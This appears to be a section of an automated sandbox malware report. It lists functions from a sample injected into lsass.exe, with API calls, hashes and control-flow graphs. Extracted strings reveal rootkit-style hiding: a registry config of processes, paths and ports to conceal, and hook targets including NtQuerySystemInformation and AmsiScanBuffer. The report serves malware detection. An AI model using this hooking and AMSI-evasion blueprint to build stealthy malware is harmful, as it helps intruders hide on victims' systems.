                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: c48b0b101631eb508e742298692c669f51239643e556d9c0e71e58ac3d4616bf
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 17015732304B80C2FA10DB12A89C75D62A5F788FC0F598136DF9A43766DE3AC9898740
                                                                  Function 00000202C0AE19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 35760653a7c3f685937cc2e69bc4cd9b7b7f135bce10eb14f96030ddb38c35a5
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 4DF01962304781D2FB208B21E9DC76D6261F744B98F858123DB8947566DA7DC68CCB00
                                                                  Function 00000202C0AE3620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3639
                                                                  • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3648
                                                                    • Part of subcall function 00000202C0AE3C74: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE254B), ref: 00000202C0AE3C8C
                                                                    • Part of subcall function 00000202C0AE3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3BCE
                                                                    • Part of subcall function 00000202C0AE3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3BFC
                                                                    • Part of subcall function 00000202C0AE3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C1E
                                                                    • Part of subcall function 00000202C0AE3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C39
                                                                    • Part of subcall function 00000202C0AE3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C5A
                                                                  • CreateThread.KERNELBASE ref: 00000202C0AE368F
                                                                    • Part of subcall function 00000202C0AE1D40: GetCurrentThread.KERNEL32 ref: 00000202C0AE1D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: a1f9a20f98be1a09609fb87148879590297a20a8bbae3459bd4eb453fa8b818a
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: B4118472618781D2FB709B30A8CD76E2290B7A4749F52412797A6857E7EF7DC46C8A00
                                                                  Function 00000202C0AB2AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 7f55e3a06d079607286065f83a5004a6c8ad7ad05728e442eb34c2896bc2e82a
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 3491D072B01790C7FB648F25D08CB6DB791F754B94F5681279F4A1B78ADA38D81AC700
                                                                  Function 00000202C0AE1AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                                    • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                                  • SleepEx.KERNELBASE ref: 00000202C0AE1AE3
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 2a8d246c19d9524347535c19656ffa5c1f21575d3b0b54c7ce5de3e3851543a3
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: D731E171610BA1C2FB509B26D9DD36E62A4EB84FC4F0650239FA987797EE24C878C250

                                                                  Non-executed Functions

                                                                  Function 00000202C0AE2BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 325 202c0ae2bf4-202c0ae2c6d 327 202c0ae2f88-202c0ae2fab 325->327 328 202c0ae2c73-202c0ae2c79 325->328 328->327 329 202c0ae2c7f-202c0ae2c82 328->329 329->327 330 202c0ae2c88-202c0ae2c8b 329->330 330->327 331 202c0ae2c91-202c0ae2ca1 GetModuleHandleA 330->331 332 202c0ae2cb5 331->332 333 202c0ae2ca3-202c0ae2cb3 GetProcAddress 331->333 334 202c0ae2cb8-202c0ae2cd6 332->334 333->334 334->327 336 202c0ae2cdc-202c0ae2cfb StrCmpNIW 334->336 336->327 337 202c0ae2d01-202c0ae2d05 336->337 337->327 338 202c0ae2d0b-202c0ae2d15 337->338 338->327 339 202c0ae2d1b-202c0ae2d22 338->339 339->327 340 202c0ae2d28-202c0ae2d3b 339->340 341 202c0ae2d3d-202c0ae2d49 340->341 342 202c0ae2d4b 340->342 343 202c0ae2d4e-202c0ae2d52 341->343 342->343 344 202c0ae2d54-202c0ae2d60 343->344 345 202c0ae2d62 343->345 346 202c0ae2d65-202c0ae2d6f 344->346 345->346 347 202c0ae2e55-202c0ae2e59 346->347 348 202c0ae2d75-202c0ae2d78 346->348 349 202c0ae2e5f-202c0ae2e62 347->349 350 202c0ae2f7a-202c0ae2f82 347->350 351 202c0ae2d8a-202c0ae2d94 348->351 352 202c0ae2d7a-202c0ae2d87 call 202c0ae1934 348->352 355 202c0ae2e64-202c0ae2e70 call 202c0ae1934 349->355 356 202c0ae2e73-202c0ae2e7d 349->356 350->327 350->340 353 202c0ae2dc8-202c0ae2dd2 351->353 354 202c0ae2d96-202c0ae2da3 351->354 352->351 359 202c0ae2dd4-202c0ae2de1 353->359 360 202c0ae2e02-202c0ae2e05 353->360 354->353 358 202c0ae2da5-202c0ae2db2 354->358 355->356 362 202c0ae2e7f-202c0ae2e8c 356->362 363 202c0ae2ead-202c0ae2eb0 356->363 367 202c0ae2db5-202c0ae2dbb 358->367 359->360 368 202c0ae2de3-202c0ae2df0 359->368 370 202c0ae2e07-202c0ae2e11 call 202c0ae1bc8 360->370 371 202c0ae2e13-202c0ae2e20 lstrlenW 360->371 362->363 372 202c0ae2e8e-202c0ae2e9b 362->372 365 202c0ae2ebd-202c0ae2eca lstrlenW 363->365 366 202c0ae2eb2-202c0ae2ebb call 202c0ae1bc8 363->366 376 202c0ae2ecc-202c0ae2edb call 202c0ae1c00 365->376 377 202c0ae2edd-202c0ae2ee7 call 202c0ae3c74 365->377 366->365 392 202c0ae2ef2-202c0ae2efd 366->392 374 202c0ae2dc1-202c0ae2dc6 367->374 375 202c0ae2e4b-202c0ae2e50 367->375 378 202c0ae2df3-202c0ae2df9 368->378 370->371 370->375 381 202c0ae2e22-202c0ae2e31 call 202c0ae1c00 371->381 382 202c0ae2e33-202c0ae2e45 call 202c0ae3c74 371->382 380 202c0ae2e9e-202c0ae2ea4 372->380 374->353 374->367 386 202c0ae2eea-202c0ae2eec 375->386 376->377 376->392 377->386 378->375 389 202c0ae2dfb-202c0ae2e00 378->389 391 202c0ae2ea6-202c0ae2eab 380->391 380->392 381->375 381->382 382->375 382->386 386->350 386->392 389->360 389->378 391->363 391->380 397 202c0ae2eff-202c0ae2f03 392->397 398 202c0ae2f74-202c0ae2f78 392->398 399 202c0ae2f0b-202c0ae2f25 call 202c0ae89f0 397->399 400 202c0ae2f05-202c0ae2f09 397->400 398->350 402 202c0ae2f28-202c0ae2f2b 399->402 400->399 400->402 404 202c0ae2f4e-202c0ae2f51 402->404 405 202c0ae2f2d-202c0ae2f4b call 202c0ae89f0 402->405 404->398 407 202c0ae2f53-202c0ae2f71 call 202c0ae89f0 404->407 405->404 407->398
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: f255fe2d23540f94120cab3b16bf883902439de12d91482f99c843968eb1158d
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: EAB19D622107E4C6FB688F25D88C7ADA7A4FB44B84F465017EFA953796DB35CC68C340
                                                                  Function 00000202C0AE81C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: c58ad0f624f02dcfc9d216364daf779c60b00d3df3fe6753b4f3d5f19fc37c01
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: 53313A72205B80CAFB648F60E8983ED7364F788744F45412BDB8E47A95DF39C658C710
                                                                  Function 00000202C0AED6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 78740f6651e28244420e0110bdc5b76e43b769878cef935dcc801556f4bb7619
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 05314B32214F80C6EB608F25E88879E73A4F788754F510227EB9D47BAADF38C559CB00
                                                                  Function 00000202C0AE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 63c30d14b03f38bca80fdeb9590442db81523b50f5b4cbe84837049985a5c024
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: AE710736210B50C6FB109F65E8DCA9D23A9F784F88F425123DB9E47B6ADE39C458C744
                                                                  Function 00000202C0AE1D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 00000202C0AE1D4B
                                                                    • Part of subcall function 00000202C0AE20C4: GetModuleHandleA.KERNEL32(?,?,?,00000202C0AE1D7D), ref: 00000202C0AE20DC
                                                                    • Part of subcall function 00000202C0AE20C4: GetProcAddress.KERNEL32(?,?,?,00000202C0AE1D7D), ref: 00000202C0AE20ED
                                                                    • Part of subcall function 00000202C0AE5F60: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 93b880e27aeaa93a52f83b01557f87b5b855ee68516ad30953b20023d173a75b
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: 3D4143A5100B8AE0FE15EF64E8DDADC2322B740358F835413D769071B79E79CA5ED391
                                                                  Function 00000202C0AE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: d3bbb0d6a33b11fdeba87f49bf8526c0ef2bbfe18e70a51474c0d76e55c01624
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: 07512772200B84C6EB54CF62E48C35EB7A5F788F99F458126DB8A0776ADF39C4598B00
                                                                  Function 00000202C0AB6D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: ae715c0618650c797de8d196486db3eda3e60c1cf3996309e67a6a542324cfbc
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: CE81A131600741C6FB60AB76A8CD3AD26E4AB89780F1B5427AB09477A7DF7DC98D8700
                                                                  Function 00000202C0AED258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 278 202c0aed258-202c0aed27a GetLastError 279 202c0aed27c-202c0aed287 FlsGetValue 278->279 280 202c0aed299-202c0aed2a4 FlsSetValue 278->280 281 202c0aed289-202c0aed291 279->281 282 202c0aed293 279->282 283 202c0aed2ab-202c0aed2b0 280->283 284 202c0aed2a6-202c0aed2a9 280->284 285 202c0aed305-202c0aed310 SetLastError 281->285 282->280 286 202c0aed2b5 call 202c0aedafc 283->286 284->285 287 202c0aed325-202c0aed33b call 202c0aecb78 285->287 288 202c0aed312-202c0aed324 285->288 289 202c0aed2ba-202c0aed2c6 286->289 302 202c0aed33d-202c0aed348 FlsGetValue 287->302 303 202c0aed358-202c0aed363 FlsSetValue 287->303 291 202c0aed2d8-202c0aed2e2 FlsSetValue 289->291 292 202c0aed2c8-202c0aed2cf FlsSetValue 289->292 293 202c0aed2f6-202c0aed300 call 202c0aecfc4 call 202c0aedb74 291->293 294 202c0aed2e4-202c0aed2f4 FlsSetValue 291->294 296 202c0aed2d1-202c0aed2d6 call 202c0aedb74 292->296 293->285 294->296 296->284 307 202c0aed34a-202c0aed34e 302->307 308 202c0aed352 302->308 304 202c0aed3c8-202c0aed3cf call 202c0aecb78 303->304 305 202c0aed365-202c0aed36a 303->305 310 202c0aed36f call 202c0aedafc 305->310 307->304 311 202c0aed350 307->311 308->303 314 202c0aed374-202c0aed380 310->314 312 202c0aed3bf-202c0aed3c7 311->312 315 202c0aed392-202c0aed39c FlsSetValue 314->315 316 202c0aed382-202c0aed389 FlsSetValue 314->316 318 202c0aed3b0-202c0aed3ba call 202c0aecfc4 call 202c0aedb74 315->318 319 202c0aed39e-202c0aed3ae FlsSetValue 315->319 317 202c0aed38b-202c0aed390 call 202c0aedb74 316->317 317->304 318->312 319->317
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED267
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2DB
